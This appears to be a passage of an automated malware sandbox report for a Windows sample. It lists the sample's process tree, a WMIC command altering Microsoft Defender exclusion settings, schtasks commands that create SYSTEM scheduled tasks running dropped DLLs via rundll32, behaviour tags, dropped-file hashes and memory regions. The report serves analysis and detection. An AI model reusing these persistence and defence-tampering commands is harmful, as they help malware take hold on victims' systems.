C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJLDvKxDU\qmMIzS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZPVskaMeORyUtyn" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZPVskaMeORyUtyn2" /F /xml "C:\Program Files (x86)\OJLDvKxDU\ziauuft.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZPVskaMeORyUtyn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZPVskaMeORyUtyn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yrjCurKJXOthHv" /F /xml "C:\Program Files (x86)\jDcnSjPvYahU2\eVbOHqF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NetXkRqHZJDfE2" /F /xml "C:\ProgramData\mMAjWdbxOIjSziVB\nqTIaeu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YkvMZvjGAPbigdKuX2" /F /xml "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\hqhwmJo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nQHiQOLyvgcbJIDARWU2" /F /xml "C:\Program Files (x86)\qpZxqHvFKXpRC\mVfYiCX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EJKQCvUwFyvoZzoaf" /SC once /ST 00:17:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\heXdjphsLYtTYYrU\TbMLkRlO\EMzfxsn.dll\",#1 /FKsite_idECm 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EJKQCvUwFyvoZzoaf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qXnxKrbPbFSTFetyh"2⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\TbMLkRlO\EMzfxsn.dll",#1 /FKsite_idECm 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\TbMLkRlO\EMzfxsn.dll",#1 /FKsite_idECm 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EJKQCvUwFyvoZzoaf"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files (x86)\OJLDvKxDU\ziauuft.xmlFilesize
2KB
MD589e589b7a74a2e600c157320e5c29c58
SHA182e468389cdb0bfc2dc560efeaa1d4d56c164dd6
SHA256ab837668e70777b7e595ab981f937fa49132723d2851c37d1af404d7d0845314
SHA512c9cc1c097f16be2eb4aaceddc49c7b26b09e834c10cce2fb3cc4caa06b0cb77a4d29e994b4b598fa3cba920542bbe0024fd6ac3ba659aac82a068e00bd4f125d
-
C:\Program Files (x86)\jDcnSjPvYahU2\eVbOHqF.xmlFilesize
2KB
MD5cc7d19ada65a7d9629c1402f4491e36a
SHA1f315b0a5493013784d52e9f1c3154490d61fa9b9
SHA256cdde3f89146a2af5126b7d9890b360d85790791828fd658ee7d3e527ab2d7ce7
SHA512213291df16d44039836e71994f10de856de2c6d16794b1021713e6083d1a2c63e7e1584927437b8770c37fb9b19137319376f2c32f16171b1dc5aae5c08b0cbc
-
C:\Program Files (x86)\qpZxqHvFKXpRC\mVfYiCX.xmlFilesize
2KB
MD5d5dcff721010e55ebc46745b4493c212
SHA15b3fe7232dabf01060c2bf98563754456a4182d9
SHA2561ded50e8be15b2953119e625502a96cafc9159a8c78563a3e1ce5c9a9559a68f
SHA512f1c17e102d0b1a40f036194468e4e0011c5b43b42e13b00311e664e3fd983e604ad5f738f335ac19d59d42f7994a63327ac24e74a18af6f55ac56d836292c956
-
C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\hqhwmJo.xmlFilesize
2KB
MD57781042c93da5e6f04501b4da1df9c79
SHA16db222074d0acf4f13a15a97e4ba4251441754ab
SHA2565b60e763294e319ebb5ccdb09012ad391821803b6225fd3d2f7aa925ab450d7e
SHA5123ba77d8365c15c77247e01ee4b339b153d187eef4109f28192dd7dead5e76f38011a35327e09dd4c10d9ee796765309038d1094fb397684166dbd312093e8263
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5fec1f0801c2d3c6c7bd7af9b43d871cc
SHA19d05f5a4241f079eeee636f24d755b780e38547f
SHA256b2f943f89b5c447aa88c4ea5a81cc52fdba96aeb33c327dda8f6f224b519296e
SHA512970d6846e8e77ac96f3f88887fbe9d42cfb7c274506fc6ae655bf3c800a14f539ce615b48129b408dc2e34997b30af7732a187cbe103dafc8d2d4a4c7178a327
-
C:\ProgramData\mMAjWdbxOIjSziVB\nqTIaeu.xmlFilesize
2KB
MD51970df1cc10446223c9a478737728ca7
SHA12709af72ea597a35714e8abc5489393684abfbc0
SHA256c4effcf0064c4d7178d3952d79dd4047bb5c54ff6734064db7f244dd73cd599b
SHA5129dc38fefd85981c88d840d4c624c766a53a9e64f5c548bccc64fec181a6e3a88723ea2da86c80cba29cc11e9251da6644bcdfda8841cb540daeb93da30305df0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD506d72db8c75c011f6778a490712d660d
SHA1988ec4f055c0ffabfac120b3e0c650b1a58c0d55
SHA256911e24650e2b8e725cc6ac18fe8d1a67f4ab5752eee714ed741a38d8152f6c4c
SHA5121cef12a971a8963963f84ac5f62812657efd1e8cc5c846962e1fff7670d0c41f8049eaea88fbc242b595b1ca68dbb577e61c8bcc590bda7e74cdd0c386ee8749
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
30KB
MD587a85a074096e4aa35e7d98c6d95a503
SHA1c8efe939e0443c044170aa6965d97f0f8c6879a0
SHA25688333302780e4957e597171875f1262b9f390b4bfa2aeca525f21986df8af7d7
SHA51259308ad88b83de6e0fe9eaae63baa1b966d859d42b1fe17c962e09cb9d17f7c8ffcb164bd1df11b61a48977e5c2df6dbbd569086910893d3c669da31b5bb5971
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD55c91333658fa7d7f2256dbcba88dfa00
SHA1ef1979edcda3c06183cd2f19278836703d7ab1bb
SHA2562e4d2c6fabfbf91ee5dece39a006ba8f705aa6528941a29eb3a02c6b1a13bda8
SHA512073977b80a233b035d8616fa3387fd879b4d52f1dd4553d80b295f7555b898d1f460c56ba4a01bed127a6eba32465549bf12179e990eb6f75f1477fb69b5f4ed
-
C:\Users\Admin\AppData\Local\Temp\7zS5D33.tmp\Install.exeFilesize
6.6MB
MD5f8efb05b940b05fc74801b61b3c0f500
SHA18e3eb6d604f3552d48ebcb385fc2681716b172af
SHA25690c6b16de088ab3f5737bcb599bb9ffd69a28abd149ab986b7fe52ba8bb2f400
SHA512028ea55f06fbfb079673df19e6e6249e3a2107a3d5485586f8c18724bf0a6a996ea5a7e31721bed9f7bf677bbf789c596994601076c66676c92fbd3a94741fff
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndfn1qgo.oun.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs.jsFilesize
6KB
MD5549d2944df9357a9d69ebf8993bd40dd
SHA1350c24027ff17f0cfc46c1bf1ac80b18a004faf9
SHA2568d4c94c5a16ae19f783befc02e453e422c2cdf5a1dfd3c1694dad1fff4185489
SHA5126db3c07f33f4b85f21c767a884076f09ddd95be9704bebe0f410f1da1e4c92c22865bb657e1b122ac46880bbb3018a55d420d1cfc26787dc1177776b814e4b50
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD532d0cd4a2bb21b93832f85684cd136b1
SHA1cc79385e0721bb20d0f20eaf2cf90d4e7260febf
SHA256667eb4c8ab53f1177e11948205dfeb73ff54246e5fa50729c6502b9c2f79cf2d
SHA5120712126aa568b622080a823c94b80f2f0d7acd87528b32d1e25c3a22486f64a23a1e21b35838c1b6a8b110e97c1bda027617aebca71f4e69baa257dbc5090e92
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD543bf36d027dbde12c3d00b2826255d90
SHA19cc432b6fe50c8458ef31209e0e519027a10ce37
SHA256c284ce4e0534c233c58f98c96664c0ee153b87bc3e069e3b8a6a934a44cb99f7
SHA5121261285e3748d27c334dee70149465c3395dbf8ae78c6da3b035fef7faa79fef2d5b552966fc611f77f5865da98f39be3c6a7781463a143cf2c564215b2e9574
-
C:\Windows\Temp\heXdjphsLYtTYYrU\TbMLkRlO\EMzfxsn.dllFilesize
6.4MB
MD5f7abebf1d656904f55bdea5a2e997543
SHA12c4cb9048f84322cd7669ac00f0c1f8b05db339a
SHA2565b1c4471df887df5d3a4331470ffcaf008c79cbe17186de3e83342676684c862
SHA512cd04387851e4cb59f5286b5f62d0022ee7a546b74c22b3c7422476839e22c4caf4d91fe81ef2ea367f32e12bb4bbf03954644f2f03456c20eb270233229c09e1
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5daa101f830f45a9c833d9c5d9fdfa363
SHA16dc60bcd936f541085880985f8da2cad56d5a93b
SHA256e1c7093f1d67539addd98d51d30dc903ae6e5eb2a39d68bbd26577d6c7e94243
SHA5124fa3f3352422e3cb9b4bd3734d35351e3493bd468ccc295844ca249e9204463943a2198450a0bc3c224a02c08308450c0e18a9f2eed3357e4cb27495dc5c20ed
-
memory/1420-146-0x0000000004050000-0x0000000004060000-memory.dmpFilesize
64KB
-
memory/1420-154-0x0000000007000000-0x0000000007350000-memory.dmpFilesize
3.3MB
-
memory/1420-139-0x0000000072D50000-0x000000007343E000-memory.dmpFilesize
6.9MB
-
memory/1420-184-0x0000000004050000-0x0000000004060000-memory.dmpFilesize
64KB
-
memory/1420-148-0x0000000004050000-0x0000000004060000-memory.dmpFilesize
64KB
-
memory/1420-185-0x0000000072D50000-0x000000007343E000-memory.dmpFilesize
6.9MB
-
memory/1420-158-0x0000000007AA0000-0x0000000007AEB000-memory.dmpFilesize
300KB
-
memory/1848-84-0x0000000005160000-0x0000000005170000-memory.dmpFilesize
64KB
-
memory/1848-87-0x0000000072EA0000-0x000000007358E000-memory.dmpFilesize
6.9MB
-
memory/1848-72-0x0000000005160000-0x0000000005170000-memory.dmpFilesize
64KB
-
memory/1848-70-0x0000000072EA0000-0x000000007358E000-memory.dmpFilesize
6.9MB
-
memory/1848-71-0x0000000005160000-0x0000000005170000-memory.dmpFilesize
64KB
-
memory/3352-8-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB
-
memory/4032-424-0x0000000003A00000-0x0000000003FD7000-memory.dmpFilesize
5.8MB
-
memory/4168-95-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmpFilesize
9.9MB
-
memory/4168-119-0x000001ABEA7B0000-0x000001ABEA7C0000-memory.dmpFilesize
64KB
-
memory/4168-100-0x000001ABEAA40000-0x000001ABEAAB6000-memory.dmpFilesize
472KB
-
memory/4168-96-0x000001ABEA7B0000-0x000001ABEA7C0000-memory.dmpFilesize
64KB
-
memory/4168-94-0x000001ABEA740000-0x000001ABEA762000-memory.dmpFilesize
136KB
-
memory/4168-123-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmpFilesize
9.9MB
-
memory/4540-206-0x00000000097A0000-0x0000000009802000-memory.dmpFilesize
392KB
-
memory/4540-131-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB
-
memory/4540-147-0x0000000008F90000-0x0000000009015000-memory.dmpFilesize
532KB
-
memory/4540-400-0x000000000A1C0000-0x000000000A28B000-memory.dmpFilesize
812KB
-
memory/4540-389-0x0000000009F80000-0x000000000A004000-memory.dmpFilesize
528KB
-
memory/4672-20-0x00000000079D0000-0x0000000007A36000-memory.dmpFilesize
408KB
-
memory/4672-21-0x0000000007CD0000-0x0000000008020000-memory.dmpFilesize
3.3MB
-
memory/4672-14-0x0000000072DC0000-0x00000000734AE000-memory.dmpFilesize
6.9MB
-
memory/4672-13-0x0000000006C00000-0x0000000006C36000-memory.dmpFilesize
216KB
-
memory/4672-39-0x0000000072DC0000-0x00000000734AE000-memory.dmpFilesize
6.9MB
-
memory/4672-37-0x0000000006BF0000-0x0000000006C00000-memory.dmpFilesize
64KB
-
memory/4672-24-0x0000000008310000-0x0000000008386000-memory.dmpFilesize
472KB
-
memory/4672-23-0x00000000085B0000-0x00000000085FB000-memory.dmpFilesize
300KB
-
memory/4672-22-0x0000000007C20000-0x0000000007C3C000-memory.dmpFilesize
112KB
-
memory/4672-15-0x0000000006BF0000-0x0000000006C00000-memory.dmpFilesize
64KB
-
memory/4672-19-0x0000000007BB0000-0x0000000007C16000-memory.dmpFilesize
408KB
-
memory/4672-17-0x0000000007270000-0x0000000007898000-memory.dmpFilesize
6.2MB
-
memory/4672-18-0x00000000071F0000-0x0000000007212000-memory.dmpFilesize
136KB
-
memory/4672-16-0x0000000006BF0000-0x0000000006C00000-memory.dmpFilesize
64KB
-
memory/4928-63-0x00000000037A0000-0x00000000037B0000-memory.dmpFilesize
64KB
-
memory/4928-51-0x0000000007490000-0x00000000074DB000-memory.dmpFilesize
300KB
-
memory/4928-49-0x0000000072EA0000-0x000000007358E000-memory.dmpFilesize
6.9MB
-
memory/4928-66-0x0000000072EA0000-0x000000007358E000-memory.dmpFilesize
6.9MB
-
memory/4928-50-0x0000000006B50000-0x0000000006EA0000-memory.dmpFilesize
3.3MB
-
memory/4944-44-0x0000000010000000-0x00000000105D7000-memory.dmpFilesize
5.8MB